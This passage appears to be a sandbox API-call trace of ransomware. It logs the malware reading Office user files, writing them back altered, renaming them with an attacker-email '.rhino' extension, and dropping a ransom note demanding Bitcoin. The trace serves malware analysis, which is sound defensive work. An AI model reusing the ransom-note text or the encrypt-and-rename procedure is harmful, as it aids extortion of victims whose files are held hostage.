Size=0x2) returned 0x72b818 [0088.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0088.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0088.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0088.317] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0088.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0180 [0088.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.318] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c8) returned 0x23b0410 [0088.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0180 | out: hHeap=0x6d0000) returned 1 [0088.318] WriteFile (in: hFile=0x104, lpBuffer=0x23b0410*, nNumberOfBytesToWrite=0x1c8, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0410*, lpNumberOfBytesWritten=0x2cfa04*=0x1c8, lpOverlapped=0x0) returned 1 [0088.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0410 | out: hHeap=0x6d0000) returned 1 [0088.318] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1c8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.319] CloseHandle (hObject=0x104) returned 1 [0088.320] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d698 [0088.320] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x23b0410 [0088.320] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0088.320] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.321] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0410 | out: hHeap=0x6d0000) returned 1 [0088.321] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0288 | out: hHeap=0x6d0000) returned 1 [0088.321] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00d0 | out: hHeap=0x6d0000) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0088.321] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0088.321] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x23b0048 [0088.321] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0088.321] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.323] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0088.323] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0088.324] CloseHandle (hObject=0x104) returned 1 [0088.325] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.325] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.325] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x509b [0088.325] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x51bb, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.325] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.325] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.332] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.332] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x509b, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x509b, lpOverlapped=0x0) returned 1 [0088.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.581] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.581] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.581] GetLastError () returned 0x0 [0088.582] SetLastError (dwErrCode=0x0) [0088.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50be) returned 0x75ef78 [0088.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0048 [0088.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0150 [0088.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.582] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0088.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0088.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0088.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0088.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.583] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0088.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0048 [0088.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b02d8 [0088.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0420 [0088.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0088.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0608 [0088.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0420 | out: hHeap=0x6d0000) returned 1 [0088.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b08d8 [0088.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0608 | out: hHeap=0x6d0000) returned 1 [0088.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x764040 [0088.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b08d8 | out: hHeap=0x6d0000) returned 1 [0088.584] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b02d8 [0088.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764040 | out: hHeap=0x6d0000) returned 1 [0088.586] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x764040 [0088.586] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0088.586] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x764e58 [0088.587] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764040 | out: hHeap=0x6d0000) returned 1 [0088.587] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x766398 [0088.587] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764e58 | out: hHeap=0x6d0000) returned 1 [0088.587] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x768360 [0088.587] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x766398 | out: hHeap=0x6d0000) returned 1 [0088.587] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x73c0b8 [0088.588] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768360 | out: hHeap=0x6d0000) returned 1 [0088.588] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x764040 [0088.588] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0088.588] WriteFile (in: hFile=0x104, lpBuffer=0x764060*, nNumberOfBytesToWrite=0x51bb, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x764060*, lpNumberOfBytesWritten=0x2cfa04*=0x51bb, lpOverlapped=0x0) returned 1 [0088.589] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764040 | out: hHeap=0x6d0000) returned 1 [0088.590] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x51bb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.590] CloseHandle (hObject=0x104) returned 1 [0088.591] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0088.591] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b02d8 [0088.591] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.591] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0088.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0150 | out: hHeap=0x6d0000) returned 1 [0088.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0088.592] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0088.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0088.592] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0088.592] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0088.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.595] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0088.595] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0088.597] CloseHandle (hObject=0x104) returned 1 [0088.598] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.599] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x2 [0088.599] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x122, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.599] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.600] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x2, lpOverlapped=0x0) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.602] GetLastError () returned 0x0 [0088.602] SetLastError (dwErrCode=0x0) [0088.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b7f8 [0088.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0048 [0088.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0150 [0088.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.602] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b818 [0088.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x122) returned 0x23b02d8 [0088.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.603] WriteFile (in: hFile=0x104, lpBuffer=0x23b02d8*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b02d8*, lpNumberOfBytesWritten=0x2cfa04*=0x122, lpOverlapped=0x0) returned 1 [0088.603] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0088.603] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x122, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.603] CloseHandle (hObject=0x104) returned 1 [0088.604] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0088.604] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b02d8 [0088.604] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.604] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.605] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0088.605] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0150 | out: hHeap=0x6d0000) returned 1 [0088.605] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.605] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x23b0048 [0088.605] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.605] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0088.605] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23b00d0 [0088.605] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.605] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0088.605] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0088.607] CloseHandle (hObject=0x104) returned 1 [0088.608] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00d0 | out: hHeap=0x6d0000) returned 1 [0088.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.610] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x53 [0088.610] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x173, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.610] 